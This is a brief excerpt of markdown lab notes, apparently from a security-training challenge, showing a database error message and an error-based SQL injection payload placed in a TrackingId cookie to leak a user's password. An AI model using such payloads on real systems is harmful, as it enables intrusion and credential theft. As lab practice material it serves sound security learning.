tnt2402/SOCIR-2023/challenge_2/labs.md

 ```

 ![](imgs/2023-10-10-00-01-34.png)
--> ERROR: subquery must return only one column
+-> ERROR.
+Subquery must return only one column

 ```
 TrackingId=' AND 1=CAST((SELECT password from users LIMIT 1) AS int)--